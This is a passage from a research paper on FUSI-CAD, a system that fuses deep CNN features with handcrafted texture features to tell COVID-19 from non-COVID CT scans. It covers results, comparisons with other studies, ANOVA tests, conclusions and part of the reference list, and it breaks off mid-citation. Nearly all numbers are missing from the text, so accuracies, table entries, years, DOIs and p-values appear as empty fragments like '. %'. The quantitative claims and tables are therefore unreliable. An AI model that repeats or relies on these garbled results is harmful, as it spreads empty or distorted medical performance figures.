scores achieved for googlenet and shufflenet cnns features were . ( . %) and . ( . %), . ( . %) and . ( %), and . ( . %) and . ( . %) for the specificity, precision, and f score, respectively. conversely, the alexnet cnn individual features achieved the least classification scores achieving . %, . ( %), . ( %), . ( . %), . ( . %) and . ( . %), for accuracy, auc, sensitivity, specificity, precision, and f score, respectively. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the other hand, for the deep feature fusion, it was clear that the fusion had improved the performance metrics of the svm classifier compared to each dl features. this was because the accuracy, auc, sensitivity, specificity, precision, and f score increased to . %, . ( %), . ( . %), . ( %), . ( %), and . ( . %), respectively. furthermore, the dor had increased to , which was also greater than dors of the alexnet, googlenet, shufflenet, and resnet- respectively. handcrafted features fusion stage three types of handcrafted (hc) features were extracted from the ct images; the statistical features, dwt, and glcm features. as stated previously, eight statistical features; entropy, mean, variance, standard deviation, minimum, maximum, and range were mined from the images. afterward, these features were fused in one feature vector and classified using the cubic kernel svm classifier giving an accuracy, auc, and sensitivity of . %, . ( %), and . ( . %), respectively. additionally, the specificity and precision accomplished the same score of . ( %). however, the f score and dor achieved . ( . %) and . , respectively. furthermore, for the dwt features, four-level decomposition was performed on the ct images. the classification scores of the four levels of dwt were shown in fig. . the classification scores of the coefficients of the fourth level dwt decomposition attained the highest scores compared to the other three levels, as it was clear in fig. . the accuracy and auc achieved were . % and . 
( %), respectively. moreover, the glcm features were extracted achieving an accuracy, auc, sensitivity, specificity, precision, f score, dor of . %, . ( %), . ( . %), . ( %), . ( %), . ( . %) and . , respectively. afterward, the three hc features were fused and classified using a cubic svm classifier. since the coefficients of the fourth level dwt achieved the highest scores comparing to the other three dwt levels. therefore, these features along with the glcm and statistical features were fused forming one feature vector and used to construct a cubic svm classifier. this svm performance was compared with the performance of the svm classifiers constructed separately with the features extracted for each of the four levels of dwt as well as glcm features and the statistical features as shown in table . table the evaluation metrics for the cubic kernel svm classifier constructed with the fused dl features compared to svm classifiers trained with each dl feature. cnn accuracy (std) auc (std) sensitivity (std) specificity (std) precision (std) f score (std) dor (std) alexnet . % ( . ) . ( ) . ( ) . ( . ) . ( . ) . ( . ) . ( . ) googlenet . % ( . ) . ( ) . ( ) . ( . ) . ( . ) . ( . ) . ( . ) shufflenet . % ( . ) . ( ) . ( ) . ( . ) . ( . ) . ( . ) ( ) resnet- . % ( . ) . ( ) . ( . ) . ( . ) . ( . ) . ( . ) , . ( . ) dl fusion . % ( . ) . ( ) . ( . ) . ( ) . ( ) . ( ) , ( ) note: bold values indicate the highest results. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the fusing of the three hc features had improved the performance of the svm classifier, as it was clear in table . the accuracy and auc increased to % and . ( . %). moreover, the sensitivity and specificity were improved as well yielding to . ( . %) and . ( . %). in addition, the precision and f score were raised to . ( . %) and . ( %). furthermore, the dor had increased to , which was greater than the dors of each hc features. deep and handcrafted features fusion stage (fusi-cad system) the fusi-cad system proposed the fusion of dl and hc features to examine the effect of this fusion on the performance of covid- diagnosis. table shows a comparison of dl, hc features fusion, and the proposed fusi-cad system (dl and hc features fusion) using a cubic kernel svm classifier. all the classification results achieved by the fusi-cad system increased, as it was obvious in table . the accuracy, sensitivity, specificity, precision, and f score increased table the evaluation metrics for the svm classifier constructed with each individual and fused hc features. handcrafted (hc) features accuracy (std) auc (std) sensitivity (std) specificity (std) precision (std) f score (std) dor (std) statistical features . % ( . ) . ( ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) fourth level dwt . % ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) glcm features . % ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) hc fusion % ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) , . ( , . ) note: bold values indicate the highest results. figure the classification scores for the four levels of dwt decomposition. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. to % each. in addition, the auc rose to . ( %), as shown in the computed roc curve in fig. . 
a comparison between the accuracies of svm classifiers constructed using individual dl features, individual hc features, dl feature fusion, hc feature fusion, and the proposed fusi-cad system is given in fig. . as shown in fig. the accuracy of the proposed fusi-cad system attained the highest score. discussions currently, the novel coronavirus is considered one of the global terrific health crisis. a quick and accurate diagnostic tool is vital to manage the propagation of this pandemic disease and assist radiologists in the diagnosis especially in high load conditions. the rt-pcr laboratory test is a well-known method to diagnose covid- , but it has poor sensitivity and inadequate availability. the test is also expensive, time-consuming, and requires a well-equipped laboratory for analysis (which is the main challenge particularly in developing countries). therefore, a faster and efficient alternative diagnostic tool is of crucial need to help the front-line professionals to attain a fast and precise diagnosis. medical imaging techniques such as ct is an effective tool to visualize the lungs and can assist the early diagnosis of covid- . however, it cannot achieve efficient diagnosis when used alone because of the likeness between patterns of the novel coronavirus and other types of pneumonia, which could confuse specialists and lead to misdiagnosis. on the other hand, cad systems based on ai techniques have proven to have stronger discriminating ability to distinguish covid- and non-covid- patients, and more accurate and faster capabilities in the diagnosis the covid- compared to the pathogenic exam, which consequently lessens the time desired for disease control (butt et al., ; shi, han & zheng, ). in this study, a faster and more accurate resolution was proposed instead of the rt-pcr test. the proposed resolution presented a novel cad system called fusi-cad system. table a comparison between the classification scores obtained by the dl, hc feature fusion, and the fusi-cad system. accuracy (std) ( % confidence interval) auc (std) ( % confidence interval) sensitivity (std) ( % confidence interval) specificity (std) ( % confidence interval) precision (std) ( % confidence interval) f score (std) ( % confidence interval) dor (std) ( % confidence interval) dl fusion . % . . . . . , ( . ) ( ) ( . ) ( ) ( ) ( ) ( ) [ . – . ] [ – ] [ . – . ] [ . – . ] [ . – . ] [ . – . ] [ , – , ] hc fusion % . . . . . , . ( . ) ( . ) ( . ) ( . ) ( . ) ( . ) ( , . ) [ . – . ] [ . – . ] [ . – . ] [ . – . ] [ . – . ] [ . – . ] [ , . – , . ] fusi-cad % . . . . . , ( . ) ( ) ( ) ( ) ( ) ( ) ( ) [ . – . ] [ – ] [ . – . ] [ . – . ] [ . – . ] [ . – . ] [ , – , ] note: bold values indicate the highest results. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. recent studies based on related image classification problems have suggested that fusing dl and handcrafted features can improve the performance of the classification model (hasan et al., ; wei et al., a; hansley, segundo & sarkar, ). therefore, the fusi-cad system was based on the fusion of multiple dl features and handcrafted features extracted from ct images to investigate the effect of this fusion on the performance of the cad system. moreover, the proposed cad system examined the influence of fusing multiple dl features extracted from four pre-trained cnns on the classification performance as in stage ( ). 
furthermore, it studied the impact of fusing three handcrafted features such as dwt, glcm, and statistical features on the classification performance as well as illustrated in stage ( ). the proposed system is considered an important trial involving a simple to set up, low cost, and automated cad system that can attain an accurate, effective, and fast diagnostic tool. throughout this tough period of the global pandemic, the proposed fusi-cad system has huge potential to be considered as a covid- diagnostic tool. it can attain early diagnosis of the novel corona disease, thus averting its rapid propagation. the fusi-cad system is an ai technique, which has a more powerful ability to distinguish between covid- and non-covid- ct images than manual diagnosis (butt et al., ). the superiority of ai techniques were confirmed in related studies by various authors (bai et al., ; chen et al., ; ardakani et al., ), who compared figure the roc curve for the fusi-cad system. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the accuracy of their cad systems based on ai techniques, with the accuracy achieved by a manual diagnosis of radiologists without the aid of a cad system. the performance attained by these studies verified that the ai based cad systems were greater than the manual diagnosis by radiologists. the authors in bai et al. ( ) indicated that their cad system based on ai reached higher test accuracy ( % vs. %), the sensitivity of ( % vs. %), and specificity ( % vs. %) than radiologists. similarly, in ardakani et al. ( ) the results attained by the radiologist were worse than the authors’ proposed ai-based cad system, with a sensitivity of ( . % vs. . %), a specificity of ( . % vs. . %), and an accuracy of ( . % vs. . %). whereas, in chen et al. ( ), the authors indicated that their ai based cad system is capable of lowering the manual radiologist’s diagnosis time by %. this study proved that dl feature fusion could enhance the diagnosis of covid- as the accuracy of the svm classifiers had increased to . %, which was higher than that of the individual dl features extracted from alexnet, googlenet, shufflenet, and resnet- cnns as shown in fig. . moreover, the study indicated that fusing the handcrafted features had improved the accuracy of the svm classifier to reach %, which was better than that of the dwt, glcm, and statistical features separately. furthermore, the performance of the proposed fusi-cad system verified that fusing dl and hc features had successfully improved the accuracy to reach %, which was higher than the other individual features of the dl methods, hc methods, the fused dl features, and fused hc features as shown in fig. . the fusi-cad system performance was compared with recent related studies based on the same dataset to verify its competence. table shows a comparison between the performance metrics of the proposed fusi-cad system and recent related studies based figure comparisons of individual dl features, individual handcrafted features, dl feature fusion, handcrafted feature fusion and the proposed fusi-cad system. full-size doi: . /peerj-cs. /fig- ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. on the sars-cov- ct-scan dataset. the accuracy ( %), auc ( . 
), sensitivity ( %), specificity ( %), precision ( %), and f score ( %) were higher than the other methods. soares et al. ( ) employed different separate cnns such as; x-dnn, resnet, googlenet, vgg- , and alexnet to classify covid- . they also used adaboosting and decision trees (dt) classifiers, however dt performance was lower than cnn. the highest result was achieved by x-dnn reaching an accuracy of . %, auc of . %, sensitivity of . %, precision of %, and f score of . %. whereas, the authors of panwar et al. ( ) presented a deep transfer learning algorithm that quickens the detection of covid- . this method used gradient weighted class activation mapping (grad-cam) to visualize and plot class activation maps. this can assist in explaining more information about the cnn while carrying out the detection process. an accuracy of %, sensitivity of %, precision of %, and f score of % were attained, which were lower than fusi-cad system because this method used only one type of cnn to perform the detection. on the other hand, pathak, shukla & arya, ( ) proposed a deep bidirectional long short-term memory (lstm) network with mixture density network (dbm) model. a memetic adaptive differential evolution (made) algorithm was employed to tune the hyper-parameters of the dbm model. the model achieved an accuracy of . %, auc of . %, sensitivity of . %, precision of . %, and f score of . %. as it can be noted from table that the authors of soares et al. ( ), panwar et al. ( ) and pathak, shukla & arya ( ) have utilized different individual cnns networks. these authors did not neither fuse several cnns architectures nor combine dl features with handcrafted features. however, the fusi-cad system fused multiple dl features with three hc features, which improved the performance of the cad system and this is considered the main advantage of the fusi-cad system. these results proved the competitiveness of the fusi-cad system compared to other studies. moreover, these results confirmed that the proposed fusi-cad system was capable of overcoming the constraint of using ct images only to diagnose the covid- disease. furthermore, according to what had been stated in colquhoun ( ), ellis ( ), table comparison between the proposed fusi-cad system and the recent related studies on the sars-cov- ct-scan dataset. paper method accuracy (%) auc (%) sensitivity (%) precision (%) f score (%) soares et al. ( ) x-dnn . . . . resnet . . . . googlenet . . . . . vgg- . . . . . alexnet . . . . . decision tree . . . . . adaboost . . . . . panwar et al. ( ) cnn – pathak, shukla & arya ( ) lstm* . . . . . proposed fusi-cad system notes: * lstm: long short-term memory. bold values indicate the highest results. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. attallah ( ) that for a cad system to be reliable, it must attain a sensitivity larger than or equal to %, specificity more than or equal to %, precision higher than or equal %, and a dor greater than or equal . therefore, the performance of the proposed fusi-cad system as in table verified that it is reliable and can be used to diagnose covid- . this was because the sensitivity, specificity, and precision achieved %, in addition to the dor was . the competing performance of the fusi-cad system revealed the idea of producing a diagnostic software tool by it (information technology) solution companies. 
this tool can be portable and desirable to the end-user, such as radiologists or specialists, to assist the diagnosis procedure of the covid- . the performance of the proposed fusi-cad system was also compared with the related work presented in table ; it was observed that the cnn constructions were different from those used in the fusi-cad system. concerning the resnet cnn constructions, it was clear that the authors of the related work employed it with several layer architectures as in butt et al. ( ), li et al. ( ), jin et al. ( a, b), song et al. ( b) and ardakani et al. ( ). butt et al. ( ) utilized the resnet- and resnet- cnns to identify covid- samples attaining an accuracy of . %, which was beneath that of the fusi-cad system. this was because they used each network individually to perform the classification. alternatively, jin et al. ( a) did the classification process using resnet- cnn achieving an accuracy of . %, which was lower than the accuracy of the fusi-cad system built with a fewer number of images. li et al. ( ), song et al. ( b) and jin et al. ( b) employed the resnet- cnn reaching an accuracy of . %, %, and . % respectively. the accuracies achieved by li et al. ( ) and song et al. ( b), were much lower than the proposed fusi-cad system. this was because they used individual resnet- networks trained with small amount of input images. however, the accuracy obtained by jin et al. ( b) was higher than li et al. ( ) and song et al. ( b). this was due to the large amount of data employed by jin et al. ( b) method compared to li et al. ( ) and song et al. ( b), but it was still lower than fusi-cad system. the reason for that was that fusi-cad system combined several dl features from cnns architectures with three handcrafted textural analysis features. instead, ardakani et al. ( ) employed resnet- cnn and achieved an accuracy of . %. the reason for this high accuracy was that the authors used very high-resolution images and they divided the images into patches. amyar, modzelewski & ruan ( ) and chen et al. ( ) used the u-net for the segmentation and/or classification procedures, the accuracies achieved were %, and . %, respectively. the high accuracy achieved by chen et al. ( ) was due to the huge number of images used to train their u-nets, but it was still lower than the accuracy of proposed fusi-cad system. this was because fusi-cad system applied the feature fusion process, which enhanced the performance. zheng et al. ( ) used a u-net for segmenting ct images, and then they built a new cnn with eight layers. the accuracy attained . %, which was much lower than achieved in fusi-cad system. furthermore, he et al. ( ) had constructed a cad system for coronavirus diagnosis based on densenet- cnn attaining an accuracy of %. although, the densenet network architecture can perform well in case trained with a huge number of images, ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. which was not the case in he et al. method. on the other hand, the authors of hasan et al. ( ) utilized dl features extracted from a new cnn architecture with a handcrafted feature extracted method and attained an accuracy of . %, which was slightly higher than that that of the fusi-cad system. the reason for the slightly outperformance of hasan et al. ( ) method was that the authors constructed a cnn with few number of convolutional layers to decrease the over-fitting by reducing the cnn construction complexity. 
conversely, fang et al. ( ) used the handcrafted features only and discarded the advantages of dl techniques and therefore, they attained a low auc of . ( . %). to test and validate the statistical significance of the results obtained, a one-way analysis of variance (anova) test was performed by the repeated fivefold cross-validation procedure. the null hypothesis ho for all classification was that the mean accuracies achieved in each experiment. table shows the results of anova test made for the fused deep features (stage ). table shows the results of anova test made for the fused handcrafted features (stage ). table presents the results of anova test executed for the fused the fusion of the multiple deep features and handcrafted features (fusi-cad). it can be observed from tables – , that the p-values achieved were lower than . . therefore, it can be concluded that there was a statistically significant difference between the results calculated for each stage. also the results of the test verify that fusi-cad is reliable. moreover, the % confidence interval calculated for each stage of the proposed system proves that fusi-cad is reliable. although the fusi-cad system outstanding performance, it still has some limitations. meanwhile, the proposed system can only differentiate between covid- and table the anova test details for the deep feature fusion. source of variation ss df ms f p-value columns . . < . error total . table the anova test details for the handcrafted feature fusion. source of variation ss df ms f p-value columns . . . < . error . . total . table the anova test details for fusi-cad system. source of variation ss df ms f p-value columns . . . < . error . total . ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. non-covid- images, but it is crucial to discriminate covid- cases from other categories of pneumonia as well. in addition, the performance of the fusi-cad system was not compared with a manual diagnosis by a radiologist. future work will focus on extending the model so that it would be able to identify other types of pneumonia, employing imaging techniques such as x-rays and constructing other types of cnns. conclusions numerous studies have proved that ai techniques are capable of assisting radiologists in accurately identifying the novel coronavirus as well as speeding up the diagnosis process. this paper proposed an accurate and fast diagnostic tool called the fusi-cad system for distinguishing covid- from non-covid- cases as an alternative to the laboratory test, which has several drawbacks. fusi-cad system is based on the fusion of four dl features with three types of handcrafted features. the results showed that fusing multiple dl features had increased the performance of the classification model compared to the performance of the model constructed with individual dl features. in addition, the outcomes of this study proved that combining the three handcrafted features had increased the accuracy of the diagnosis of covid- . additionally, the fusi-cad system had proved that fusing multiple dl and handcrafted features had a positive impact on the diagnosis of covid- . furthermore, it revealed its competitive performance compared to similar studies based on the same dataset. consequently, the fusi-cad system can be successfully used by radiologists to expedite the diagnosis procedure of covid- . 
additionally, the fusi-cad system could help in controlling the present epidemic, accelerate the diagnosis of such virus, deaccelerate its spread, and enable clinicians to enhance the quality of patient management, even in unusual workload circumstances. the fusi-cad system must experience additional field-testing afore radiologists can engage it. moreover, it will probably have to endure regulatory approval by health authorities before its implementation into hospitals. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � dina a. ragab conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � omneya attallah conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the dataset is available at kaggle: eduardo soares and plamen angelov, “sars-cov- ct-scan dataset.” kaggle, doi . /kaggle/dsv/ . the data was described at: a fully automated deep learning-based network for detecting covid- from a new and large lung ct scan dataset, mohammad rahimzadeh, abolfazl attar, seyed mohammad sakhaei. medrxiv . . . ; doi . / . . . . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ai t, yang z, hou h, zhan c, chen c, lv w, tao q, sun z, xia l. . correlation of chest ct and rt-pcr testing in coronavirus disease (covid- ) in china: a report of cases. radiology ( ):e –e doi . /radiol. . al-shamasneh ar, jalab ha, palaiahnakote s, obaidellah uh, ibrahim rw, el-melegy mt. . a new local fractional entropy-based model for kidney mri image enhancement. entropy ( ): doi . /e . amyar a, modzelewski r, ruan s. . multi-task deep learning based ct imaging analysis for covid- : classification and segmentation. medrxiv doi . / . . . . anitha v, murugavalli s. . brain tumour classification using two-tier classifier with adaptive segmentation technique. iet computer vision ( ): – doi . /iet-cvi. . . ardakani aa, kanafi ar, acharya ur, khadem n, mohammadi a. . application of deep learning technique to manage covid- in routine clinical practice using ct images: results of convolutional neural networks. computers in biology and medicine : . attallah o. . an effective mental stress state detection and evaluation system using minimum number of frontal brain electrodes. diagnostics ( ): – doi . /diagnostics . attallah o, gadelkarim h, sharkas ma. . detecting and classifying fetal brain abnormalities using machine learning techniques. in: th ieee international conference on machine learning and applications (icmla). – . attallah o, karthikesalingam a, holt pj, thompson mm, sayers r, bown mj, choke ec, ma x. a. using multiple classifiers for predicting the risk of endovascular aortic aneurysm repair re-intervention through hybrid feature selection. proceedings of the institution of mechanical engineers, part h: journal of engineering in medicine ( ): – doi . / . 
attallah o, karthikesalingam a, holt pj, thompson mm, sayers r, bown mj, choke ec, ma x. b. feature selection through validation and un-censoring of endovascular repair survival data for predicting the risk of re-intervention. bmc medical informatics and decision making ( ): – doi . /s - - - . attallah o, sharkas ma, gadelkarim h. . fetal brain abnormality classification from mri images of different gestational age. brain sciences ( ): – doi . /brainsci . ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / https://dx.doi.org/ . /kaggle/dsv/ https://dx.doi.org/ . / . . . http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /e http://dx.doi.org/ . / . . . http://dx.doi.org/ . /iet-cvi. . http://dx.doi.org/ . /diagnostics http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /brainsci https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. attallah o, sharkas ma, gadelkarim h. . deep learning techniques for automatic detection of embryonic neurodevelopmental disorders. diagnostics ( ): – doi . /diagnostics . bai hx, wang r, xiong z, hsieh b, chang k, halsey k, tran tml, choi jw, wang d-c, shi l- b. . ai augmentation of radiologist performance in distinguishing covid- from pneumonia of other etiology on chest ct. radiology ( ): . butt c, gill j, chun d, babu ba. . deep learning system to screen coronavirus disease pneumonia. applied intelligence ( ): doi . /s - - - . capizzi g, sciuto gl, napoli c, polap d, woźniak m. . small lung nodules detection based on fuzzy-logic and probabilistic neural network with bio-inspired reinforcement learning. ieee transactions on fuzzy systems ( ): – doi . /tfuzz. . castellano g, bonilha l, li lm, cendes f. . texture analysis of medical images. clinical radiology ( ): – doi . /j.crad. . . . chato l, chow e, latifi s. . wavelet transform to improve accuracy of a prediction model for overall survival time of brain tumor patients based on mri images. in: ieee international conference on healthcare informatics (ichi). – . chen j, wu l, zhang j, zhang l, gong d, zhao y, hu s, wang y, hu x, zheng b. . deep learning-based model for detecting novel coronavirus pneumonia on high-resolution computed tomography: a prospective study. medrxiv doi . / . . . . cheng z, qin l, cao q, dai j, pan a, yang w, gao y, chen l, yan f. . quantitative computed tomography of the coronavirus disease (covid- ) pneumonia. radiology of infectious diseases ( ): – . chung m, bernheim a, mei x, zhang n, huang m, zeng x, cui j, xu w, yang y, fayad za. . ct imaging features of novel coronavirus ( -ncov). radiology ( ): – doi . /radiol. . colquhoun d. . an investigation of the false discovery rate and the misinterpretation of p-values. royal society open science ( ): doi . /rsos. . depeursinge a, al-kadi os, ross mitchell j. . biomedical texture analysis. first edition. cambridge: academic press. dirvanauskas d, maskeliunas r, raudonis v, damasevicius r. . embryo development stage prediction algorithm for automated time lapse incubators. computer methods and programs in biomedicine : – doi . /j.cmpb. . . . dong d, tang z, wang s, hui h, gong l, lu y, xue z, liao h, chen f, yang f. . the role of imaging in the detection and management of covid- : a review. epub ahead of print april . ieee reviews in biomedical engineering doi . /rbme. . ellis pd. . 
the essential guide to effect sizes: statistical power, meta-analysis, and the interpretation of research results. cambridge: cambridge university press. fang m, he b, li l, dong d, yang x, li c, meng l, zhong l, li h, li h. . ct radiomics can help screen the coronavirus disease (covid- ): a preliminary study. science china information sciences. ( ): . girshick r, donahue j, darrell t, malik j. . rich feature hierarchies for accurate object detection and semantic segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. – . hancer e, xue b, zhang m. . differential evolution for filter feature selection based on information theory and feature ranking. knowledge-based systems : – doi . /j.knosys. . . . ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /diagnostics http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tfuzz. http://dx.doi.org/ . /j.crad. . . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /rsos. http://dx.doi.org/ . /j.cmpb. . . http://dx.doi.org/ . /rbme. http://dx.doi.org/ . /j.knosys. . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. hansley ee, segundo mp, sarkar s. . employing fusion of learned and handcrafted features for unconstrained ear recognition. iet biometrics ( ): – doi . /iet-bmt. . . haralick rm, shanmugam k, dinstein i. . textural features for image classification. ieee transactions on systems, man, and cybernetics smc- ( ): – doi . /tsmc. . . hasan am, al-jawad mm, jalab ha, shaiba h, ibrahim rw, al-shamasneh ar. . classification of covid- coronavirus, pneumonia and healthy lungs in ct scans using q-deformed entropy and deep learning features. entropy ( ): doi . /e . he x, yang x, zhang s, zhao j, zhang y, xing e, xie p. . sample-efficient deep learning for covid- diagnosis based on ct scans. medrxiv doi . / . . . . he k, zhang x, ren s, sun j. . deep residual learning for image recognition. in: ieee conference on computer vision and pattern recognition. – . iwasawa t, sato m, yamaya t, sato y, uchida y, kitamura h, hagiwara e, komatsu s, utsunomiya d, ogura t. . ultra-high-resolution computed tomography can demonstrate alveolar collapse in novel coronavirus (covid- ) pneumonia. japanese journal of radiology ( ): – doi . /s - - -y. jin c, chen w, cao y, xu z, zhang x, deng l, zheng c, zhou j, shi h, feng j. a. development and evaluation of an ai system for covid- diagnosis. medrxiv doi . / . . . . jin s, wang b, xu h, luo c, wei l, zhao w, hou x, ma w, xu z, zheng z. b. ai-assisted ct imaging analysis for covid- screening: building and deploying a medical ai system in four weeks. medrxiv doi . / . . . . karthikesalingam a, attallah o, ma x, bahia ss, thompson l, vidal-diez a, choke ec, bown mj, sayers rd, thompson mm. . an artificial neural network stratifies the risks of reintervention and mortality after endovascular aneurysm repair; a retrospective observational study. plos one ( ):e doi . /journal.pone. . kassner a, thornhill re. . texture analysis: a review of neurologic mr imaging applications. american journal of neuroradiology ( ): – doi . /ajnr.a . ke q, zhang j, wei w, po ap d, woźniak m, kośmider l, damaševĭcius r. . a neuro-heuristic approach for recognition of lung diseases from x-ray images. expert systems with applications : – . kolossváry m, karády j, szilveszter b, kitslaar p, hoffmann u, merkely b, maurovich-horvat p. . 
radiomic features are superior to conventional quantitative computed tomographic metrics to identify coronary plaques with napkin-ring sign. circulation: cardiovascular imaging :e . krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep convolutional neural networks. in: advances in neural information processing systems, toronto: university of toronto, – . lahmiri s, boukadoum m. . hybrid discrete wavelet transform and gabor filter banks processing for features extraction from biomedical images. journal of medical engineering ( ): – doi . / / . lambin p, rios-velazquez e, leijenaar r, carvalho s, van stiphout rg, granton p, zegers cm, gillies r, boellard r, dekker a. . radiomics: extracting more information from medical images using advanced feature analysis. european journal of cancer ( ): – doi . /j.ejca. . . . ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /iet-bmt. . http://dx.doi.org/ . /tsmc. . http://dx.doi.org/ . /e http://dx.doi.org/ . / . . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / . . . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /ajnr.a http://dx.doi.org/ . / / http://dx.doi.org/ . /j.ejca. . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. lei j, li j, li x, qi x. . ct imaging of the novel coronavirus ( -ncov) pneumonia. radiology ( ): doi . /radiol. . li l, qin l, xu z, yin y, wang x, kong b, bai j, lu y, fang z, song q. . artificial intelligence distinguishes covid- from community acquired pneumonia on chest ct. epub ahead of print march . radiology doi . /radiol. . m.pizer s, amburn ep, daustin j, cromartie r, geselowitz a, greer t, ter haar romeny b, zimmerman jb, zuiderveld k. . adaptive histogram equalization and its variations. computer vision, graphics, and image processing ( ): – doi . /s - x( ) -x. mallat sg. . a theory for multiresolution signal decomposition: the wavelet representation. in: ieee transactions on pattern analysis and machine intelligence. – . nailon wh. . texture analysis methods for medical image characterisation. in: biomedical imaging. london: intech publishing. nanni l, ghidoni s, brahnam s. . handcrafted vs. non-handcrafted features for computer vision classification. pattern recognition : – doi . /j.patcog. . . . nguyen dt, pham td, baek nr, park kr. . combining deep and handcrafted image features for presentation attack detection in face recognition systems using visible-light camera sensors. sensors ( ): doi . /s . panwar h, gupta pk, siddiqui mk, morales-menendez r, bhardwaj p, singh v. . a deep learning and grad-cam based color visualization approach for fast detection of covid- cases using chest x-ray and ct-scan images. chaos, solitons & fractals : . pathak y, shukla pk, arya kv. . deep bidirectional classification model for covid- disease infected patients. in: ieee/acm transactions on computational biology and bioinformatic. paules ci, marston hd, fauci as. . coronavirus infections—more than just the common cold. jama ( ): – doi . /jama. . . pisano ed, zong s, hemminger bm, deluca m, johnston re, muller k, braeuning mp, pizer sm. . contrast limited adaptive histogram equalization image processing to improve the detection of simulated spiculations in dense mammograms. journal of digital imaging ( ): – doi . /bf . ragab da, sharkas m, attallah o. . breast cancer diagnosis using an efficient cad system based on multiple classifiers. diagnostics ( ): . ragab da, sharkas m, marshall s, ren j. . 
breast cancer detection using deep convolutional neural networks and support vector machines. peerj ( ):e doi . /peerj. . ravì d, wong c, deligianni f, berthelot m, andreu-perez j, lo b, yang g-z. . deep learning for health informatics. ieee journal of biomedical and health informatics : – . sahakyan a, hs. . segmentation of the breast region in digital mammograms and detection of masses. international journal of advanced computer science and applications (ijacsa) : – . shi h, han x, zheng c. . evolution of ct manifestations in a patient recovered from novel coronavirus ( -ncov) pneumonia in wuhan, china. radiology ( ): doi . /radiol. . singh d, kumar v, kaur m. . classification of covid- patients from chest ct images using multi-objective differential evolution-based convolutional neural networks. epub ahead of print april . european journal of clinical microbiology & infectious diseases doi . /s - - -z. ragab and attallah ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - x( ) -x http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /jama. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - - -z https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. soares e, angelov p, biaso s, froes mh, abe dk. . sars-cov- ct-scan dataset: a large dataset of real patients ct scans for sars-cov- identification. medrxiv doi . / . . . . song f, shi n, shan f, zhang z, shen j, lu h, ling y, jiang y, shi y. a. emerging novel coronavirus ( -ncov) pneumonia. radiology ( ): – doi . /radiol. . song y, zheng s, li l, zhang x, zhang x, huang z, chen j, zhao h, jie y, wang r. b. deep learning enables accurate diagnosis of novel coronavirus (covid- ) with ct images. medrxiv doi . / . . . . srivastava v, purwar rk. . a five-level wavelet decomposition and dimensional reduction approach for feature extraction and classification of mr and ct scan images. applied computational intelligence and soft computing ( ): – doi . / / . szegedy c, liu w, jia y, sermanet p, reed s, anguelov d, erhan d, vanhoucke v, rabinovich a. . going deeper with convolutions. in: proceedings of the ieee conference on computer vision and pattern recognition. – . vaishya r, javaid m, khan ih, haleem a. . artificial intelligence (ai) applications for covid- pandemic. diabetes & metabolic syndrome: clinical research & reviews ( ): – . wagh kp, vasanth k. . electroencephalograph (eeg) based emotion recognition system: a review. in: saini h, singh r, patel v, santhi k, ranganayakulu s, eds. innovations in electronics and communication engineering. lecture notes in networks and systems. vol. . singapore: springer, – . wang s, kang b, ma j, zeng x, 